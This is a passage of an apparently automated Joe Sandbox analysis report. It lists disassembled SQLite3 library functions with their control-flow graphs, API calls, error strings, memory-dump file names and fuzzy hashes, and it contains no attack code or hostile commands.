                                                                                                  control_flow_graph 455 61e62092-61e62119 call 61e70a06 458 61e6211f-61e62133 455->458 459 61e6235a-61e6235e 455->459 460 61e62135-61e6213d 458->460 461 61e62142-61e62155 call 61e13056 458->461 462 61e62360-61e62367 459->462 463 61e62369-61e6236b call 61e0a6b0 459->463 465 61e6238e-61e623a2 460->465 471 61e62186-61e62189 461->471 472 61e62157-61e6215b call 61e3fd28 461->472 462->463 467 61e62370-61e6237a call 61e1493c 462->467 463->467 467->465 474 61e62190-61e621a7 call 61e13372 471->474 475 61e62160-61e6216b 472->475 479 61e621a9-61e621ad 474->479 475->471 477 61e6216d-61e62181 call 61e0bd80 call 61e11aa4 475->477 495 61e6234c-61e62358 call 61e0afe0 477->495 481 61e621af-61e621b9 479->481 482 61e621bb-61e621c8 479->482 481->482 484 61e621ca-61e621ce 482->484 485 61e621eb-61e621f5 482->485 487 61e621d0-61e621da 484->487 488 61e621dc-61e621e7 484->488 489 61e621fa-61e6220a 485->489 487->489 491 61e6224f-61e62264 call 61e11aa4 488->491 492 61e621e9 488->492 493 61e6220c-61e62226 call 61e01dfd call 61e1375f 489->493 494 61e6222b-61e6223b 489->494 506 61e62344-61e62347 call 61e4593a 491->506 507 61e6226a-61e62384 call 61e0afe0 491->507 492->489 493->494 499 61e62241-61e62248 494->499 500 61e6223d 494->500 495->459 495->465 501 61e6226f-61e62272 499->501 502 61e6224a 499->502 500->499 508 61e62274-61e62278 501->508 509 61e6227e-61e622fa call 61e2f943 sqlite3_exec call 61e0f66a 501->509 502->491 506->495 507->459 508->509 512 61e6227a 508->512 520 61e62306-61e6230a 509->520 521 61e622fc-61e62301 call 61e61fb8 509->521 512->509 522 61e6230c-61e62318 call 61e14995 520->522 523 61e6231a-61e6231c 520->523 521->520 526 61e62335-61e62339 522->526 523->526 527 61e6231e-61e62331 523->527 526->527 531 61e6233b-61e62342 526->531 529 61e62386-61e62389 call 61e0afe0 527->529 530 61e62333 527->530 529->465 530->506 531->495 531->506
                                                                                                  Strings
                                                                                                  • sqlite_master, xrefs: 61E620AA
                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 61E621E0
                                                                                                  • sqlite_temp_master, xrefs: 61E620B0
                                                                                                  • unsupported file format, xrefs: 61E6224A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                                  • API String ID: 0-2834926380
                                                                                                  • Opcode ID: 668539f068e00c70f718d778b6c129490ab944d6bbc7fe14519c5d657d5be9d5
                                                                                                  • Instruction ID: 126efefc8666987d41b367ea10850b38c09f2cf6e78172d9af59718c67f95019
                                                                                                  • Opcode Fuzzy Hash: 668539f068e00c70f718d778b6c129490ab944d6bbc7fe14519c5d657d5be9d5
                                                                                                  • Instruction Fuzzy Hash: 61A11274A4838A8BDB10CFA8C480B8EBBF5BF98318F64C429D858AB355D735D845CB81
                                                                                                  Function 61E3FD28 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 533 61e3fd28-61e3fd46 call 61e13056 536 61e402e1-61e402e5 533->536 537 61e3fd4c-61e3fd4e 533->537 540 61e402f7-61e402fb 536->540 541 61e402e7-61e402f5 536->541 538 61e3fd50-61e3fd54 537->538 539 61e3fd5a-61e3fd60 537->539 538->536 538->539 544 61e3fd62-61e3fd68 539->544 545 61e3fd6f-61e3fd75 539->545 542 61e40307-61e40314 540->542 543 61e402fd-61e402ff 540->543 541->540 542->543 547 61e40316-61e4031a 542->547 546 61e4032d-61e40343 call 61e0afe0 543->546 544->545 548 61e3fd6a 544->548 549 61e3fd77-61e3fd80 545->549 550 61e3fd88-61e3fd8c 545->550 547->543 551 61e4031c-61e40323 call 61e121b6 547->551 548->545 549->546 553 61e3fd86 549->553 554 61e3fd94-61e3fd96 550->554 555 61e3fd8e-61e3fd92 550->555 551->546 553->554 558 61e3fd98-61e3fd9d 554->558 559 61e3fd9f-61e3fda3 554->559 555->554 555->558 560 61e3fdbb-61e3fdc2 558->560 561 61e3fda5 559->561 562 61e3fdc8-61e3fddd call 61e0289b 559->562 560->546 560->562 564 61e3fda8-61e3fdaa 561->564 562->546 570 61e3fde3-61e3fdf2 562->570 564->562 566 61e3fdac-61e3fdb0 564->566 568 61e3fdb2-61e3fdb4 566->568 569 61e3fdb6-61e3fdb9 566->569 568->560 569->564 571 61e3fdf4-61e3fdf7 570->571 572 61e3fdfb-61e3fe00 570->572 571->572 573 61e3fe03-61e3fe07 572->573 574 61e3fe0d-61e3fe18 call 61e3ee06 573->574 575 61e400ab-61e400ad 573->575 574->575 583 61e3fe1e-61e3fe2f call 61e02c46 574->583 576 61e40216-61e40218 575->576 577 61e400b3-61e400b7 575->577 581 61e40223-61e4022d call 61e3ebff 576->581 582 61e4021a-61e4021c 576->582 577->576 580 61e400bd-61e400c1 577->580 584 61e400c7-61e400ce 580->584 585 61e4021e 580->585 586 61e40230-61e40233 581->586 582->586 595 61e3fe34-61e3fe38 583->595 589 61e400d4-61e400e2 584->589 590 61e401eb-61e401f1 584->590 585->581 592 61e40235-61e40239 586->592 593 61e4025a-61e4025c 586->593 596 61e40207-61e4020b 589->596 597 61e400e8-61e400f0 589->597 590->581 599 61e401f3-61e40205 590->599 592->546 598 61e4023f-61e4024f call 61e052f9 592->598 593->546 594 61e40262-61e40266 593->594 601 61e40281-61e40290 594->601 602 61e40268-61e4026f 594->602 595->575 603 61e3fe3e-61e3fe5b 595->603 596->582 600 61e4020d-61e40214 call 61e3fc70 596->600 604 61e400f6-61e400fa 597->604 605 61e401c1-61e401d3 call 61e157d9 597->605 598->573 624 61e40255 598->624 599->581 600->576 609 61e40295-61e40299 601->609 610 61e40292 601->610 602->601 608 61e40271-61e4027e 602->608 611 61e3fe91-61e3fe94 603->611 612 61e3fe5d-61e3fe8f memcmp 603->612 613 61e40136-61e40143 604->613 614 61e400fc-61e40100 604->614 631 61e401d5-61e401d7 605->631 632 61e401e7-61e401e9 605->632 608->601 619 61e40325-61e40329 609->619 620 61e4029f-61e402b0 609->620 610->609 618 61e3fe97-61e3fe9e 611->618 612->618 613->585 623 61e40149-61e40159 call 61e0af68 613->623 614->613 621 61e40102-61e40112 call 61e157d9 614->621 625 61e3fea4-61e3fea8 618->625 626 61e4001e 618->626 619->541 630 61e4032b 619->630 627 61e402b5-61e402c4 620->627 628 61e402b2 620->628 621->590 645 61e40118-61e40132 call 61e0af46 621->645 623->590 642 61e4015f-61e40187 memcmp 623->642 624->546 635 61e40025-61e40085 625->635 636 61e3feae-61e3fece memcmp 625->636 626->635 638 61e402c6-61e402d2 call 61e3d886 627->638 639 61e40301-61e40305 627->639 628->627 630->543 631->632 640 61e401d9-61e401e5 call 61e15828 631->640 632->590 641 61e40189-61e401a7 632->641 635->573 643 61e3fed4-61e3fede 636->643 644 61e4008a 636->644 638->546 659 61e402d4-61e402df 638->659 639->541 639->542 640->632 641->596 642->641 648 61e401a9-61e401bf call 61e0afc3 642->648 649 61e3fee0 643->649 650 61e3fee5-61e3feec 643->650 651 61e4008f-61e400a1 call 61e3ebd8 644->651 645->613 648->599 649->650 650->644 658 61e3fef2 650->658 665 61e400a3-61e400a5 651->665 662 61e3ff33-61e3ff56 memcmp 658->662 663 61e3fef4-61e3fef8 658->663 659->639 662->644 664 61e3ff5c-61e3ff7a 662->664 663->662 666 61e3fefa-61e3ff12 call 61e91e88 663->666 664->644 668 61e3ff80-61e3ff8b 664->668 665->573 665->575 666->651 671 61e3ff18-61e3ff1f 666->671 668->644 670 61e3ff91-61e3ffa3 668->670 672 61e3ffa5-61e3ffd3 call 61e3ebd8 call 61e0b0a8 call 61e139cb 670->672 673 61e3ffd8-61e3ffdf 670->673 671->662 676 61e3ff21-61e3ff2e call 61e3ebd8 671->676 672->665 674 61e3ffe1-61e3ffe7 673->674 675 61e3fffa-61e40000 673->675 674->675 678 61e3ffe9-61e3fff5 call 61e290d7 674->678 675->644 680 61e40006-61e4001c 675->680 676->573 678->651 680->635
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_mutex_try
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 2794522359-4108050209
                                                                                                  • Opcode ID: bdeb2c0d8014c408e0c038056a7015ec69a304939350b241a289f488e8b399f3
                                                                                                  • Instruction ID: 7c32d0843cc6ff6cbb4be9885c4192522ca5d9639d1661390ab352a5c33697d1
                                                                                                  • Opcode Fuzzy Hash: bdeb2c0d8014c408e0c038056a7015ec69a304939350b241a289f488e8b399f3
                                                                                                  • Instruction Fuzzy Hash: 3C128870A042558FEB05CFA8D484B9EBBF0AF99308F24C4ADD855EB396D778D881CB51
                                                                                                  Function 61E628E3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 61E03B6D: sqlite3_stricmp.SQLITE3 ref: 61E03B9A
                                                                                                    • Part of subcall function 61E03B6D: sqlite3_stricmp.SQLITE3 ref: 61E03BB2
                                                                                                  • sqlite3_strnicmp.SQLITE3 ref: 61E62975
                                                                                                    • Part of subcall function 61E03FF8: sqlite3_stricmp.SQLITE3 ref: 61E0402B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                                                                  • String ID: no such table$no such view
                                                                                                  • API String ID: 2198927396-301769730
                                                                                                  • Opcode ID: c62eb199e9588d5d6e5eddf59372ac794658e18c10018c6c868a3206a4c15514
                                                                                                  • Instruction ID: 96c13b159e51404229eccb5a43295675180517db91716090a008738a6ce2f674
                                                                                                  • Opcode Fuzzy Hash: c62eb199e9588d5d6e5eddf59372ac794658e18c10018c6c868a3206a4c15514
                                                                                                  • Instruction Fuzzy Hash: AA61E470A043469FDB00CFB9C880A5EBBF5AF98248F24C82DE855DB355D774E8818B81
                                                                                                  Function 61E28E5F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 759 61e28e5f-61e28e87 760 61e28ed1-61e28ef0 759->760 761 61e28e89 759->761 762 61e28ef3-61e28f1a ReadFile 760->762 763 61e28e90-61e28e9f 761->763 764 61e28e8b-61e28e8e 761->764 765 61e28f35-61e28f3e 762->765 766 61e28f1c-61e28f2f call 61e28977 762->766 767 61e28ea1 763->767 768 61e28eb4-61e28ece 763->768 764->760 764->763 765->766 777 61e28f40-61e28f4d call 61e18126 765->777 772 61e28f31-61e28f33 766->772 775 61e28f74-61e28f80 766->775 770 61e28ea3-61e28ea5 767->770 771 61e28ea7-61e28eb2 767->771 768->760 770->768 770->771 771->772 776 61e28f85-61e28f8c 772->776 775->776 777->762 780 61e28f4f-61e28f72 call 61e27f25 777->780 780->776
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: winRead
                                                                                                  • API String ID: 2738559852-2759563040
                                                                                                  • Opcode ID: c4337cb0fd85850df469cf7f31fe0deb70697ba84c08d7b32f8bb4299fa788be
                                                                                                  • Instruction ID: dbb1822c21219dbedb142de40895b69f70508cfcab968c75da9fb2436267f57b
                                                                                                  • Opcode Fuzzy Hash: c4337cb0fd85850df469cf7f31fe0deb70697ba84c08d7b32f8bb4299fa788be
                                                                                                  • Instruction Fuzzy Hash: 1941F071A052599BDF04CFA8D8A098EBBF2FF88314F25C529F968A7304D730E941DB91
                                                                                                  Function 61E10775 Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 783 61e10775-61e1078b 784 61e10791-61e10797 783->784 785 61e10870 783->785 784->785 787 61e1079d-61e107a6 784->787 786 61e10872-61e10879 785->786 788 61e10865-61e1086e 787->788 789 61e107ac-61e107ca sqlite3_mutex_enter 787->789 788->786 792 61e107d2-61e107e1 789->792 793 61e107cc 789->793 794 61e107e3 792->794 795 61e10825-61e10828 call 61e29053 792->795 793->792 796 61e107e5-61e107e8 794->796 797 61e107ea-61e10801 794->797 800 61e1082e-61e10832 795->800 796->795 796->797 798 61e10803 797->798 799 61e1081b 797->799 803 61e10805-61e10808 798->803 804 61e1080a-61e10819 call 61e09d6d 798->804 799->795 801 61e10854-61e10863 sqlite3_mutex_leave 800->801 802 61e10834-61e1084f call 61e0178f call 61e0149c * 2 800->802 801->786 802->801 803->799 803->804 804->795
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E107B4
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E1085C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  • Opcode ID: 54c4f853e93985096033869ff372d1fc870533058da7617f5f2967a284d588cc
                                                                                                  • Instruction ID: b356a87c22c2ca4caf9f79a52b35de56e5ce04f269780aeea373e7d77147a2ac
                                                                                                  • Opcode Fuzzy Hash: 54c4f853e93985096033869ff372d1fc870533058da7617f5f2967a284d588cc
                                                                                                  • Instruction Fuzzy Hash: E521A331E58B41CBDB009FB8C88535DBAE1BB86318F258529D854D7394D7B8C8D5CB81
                                                                                                  Function 61E29053 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 813 61e29053-61e2906a malloc 814 61e29079-61e29094 sqlite3_log 813->814 815 61e2906c-61e29077 813->815 816 61e29097-61e2909c 814->816 815->816
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: mallocsqlite3_log
                                                                                                  • String ID:
                                                                                                  • API String ID: 2785431543-0
                                                                                                  • Opcode ID: 2497b9eac1ed071629c9c860313966b520965d8eb31863f906c97374ca8e31d7
                                                                                                  • Instruction ID: 0670e2dbad01d94845d600d9f87d4dcf0925d8d06e91d12d53a56787fb03e60a
                                                                                                  • Opcode Fuzzy Hash: 2497b9eac1ed071629c9c860313966b520965d8eb31863f906c97374ca8e31d7
                                                                                                  • Instruction Fuzzy Hash: C6F039B0C0830EABDB009FA5C9C1949BFE8AF44358F14C86DD9884F311E239E580CB51
                                                                                                  Function 61E13552 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 817 61e13552-61e13563 818 61e13565-61e13567 817->818 819 61e13569-61e1356c 818->819 820 61e1356e-61e13574 818->820 819->818 821 61e13576-61e13578 820->821 822 61e1357a-61e1357d 821->822 823 61e1357f-61e13590 821->823 822->821 824 61e13596-61e135a2 823->824 825 61e136ac-61e136b3 823->825 826 61e135b2-61e135c7 824->826 827 61e135a4-61e135ad sqlite3_free 824->827 828 61e13605-61e13607 826->828 829 61e135c9-61e135cb 826->829 827->826 830 61e13609-61e1362c 828->830 829->828 831 61e135cd-61e135d2 829->831 832 61e13683-61e136a2 830->832 833 61e1362e-61e1363a 830->833 831->830 834 61e135d4-61e135df call 61e016d8 call 61e10775 831->834 832->825 835 61e1363c-61e13640 833->835 841 61e135e4-61e135f1 call 61e016e9 834->841 837 61e13642-61e13655 835->837 838 61e13657-61e13681 835->838 837->835 838->825 841->830 844 61e135f3-61e13603 call 61e0178f 841->844 844->830
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2313487548-0
                                                                                                  • Opcode ID: 5d500ef5f87f43bad8fe0ab39683864ceec280efcc78f536c1c9c76f3707bdbd
                                                                                                  • Instruction ID: a2c751746a67533484b96b99feea120ac339a23e65d27da0d6d512f786f1c3f9
                                                                                                  • Opcode Fuzzy Hash: 5d500ef5f87f43bad8fe0ab39683864ceec280efcc78f536c1c9c76f3707bdbd
                                                                                                  • Instruction Fuzzy Hash: 4641B1729092108BDF05CF69C4813D97BE1BF48768F29867DCC58AF349D775C8408BA0

                                                                                                  Non-executed Functions

                                                                                                  Function 61E25EFD Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E25F52
                                                                                                  • sqlite3_value_bytes.SQLITE3 ref: 61E25F72
                                                                                                  • sqlite3_value_blob.SQLITE3 ref: 61E25F7F
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25F96
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E25FE6
                                                                                                  • sqlite3_result_text64.SQLITE3 ref: 61E26136
                                                                                                  • sqlite3_result_blob64.SQLITE3 ref: 61E26190
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 3992148849-0
                                                                                                  • Opcode ID: c2d0ee053c48204eb988723a62b28b779409c51639ca3f5a68df5f0e9df748a9
                                                                                                  • Instruction ID: 851ee7b833ecd36eb5d1f80d2d04e5b9eeecf1083cfa376fef74001c6b3005d4
                                                                                                  • Opcode Fuzzy Hash: c2d0ee053c48204eb988723a62b28b779409c51639ca3f5a68df5f0e9df748a9
                                                                                                  • Instruction Fuzzy Hash: EB915E75E042998FDB11CFA8C8A0A9DBBF1BB8D324F38C329D86497395D734D8429B41
                                                                                                  Function 61E1C802 Relevance: 7.8, APIs: 5, Instructions: 337COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1984881590-0
                                                                                                  • Opcode ID: 91e8b4dbfb976edfc2408a8010b1f075eb84adde925aa96fbe78564c8d1f7a2d
                                                                                                  • Instruction ID: bae385f28bfb006c8c72587603dfb1125932ea9dcd68260ed360e1294c815244
                                                                                                  • Opcode Fuzzy Hash: 91e8b4dbfb976edfc2408a8010b1f075eb84adde925aa96fbe78564c8d1f7a2d
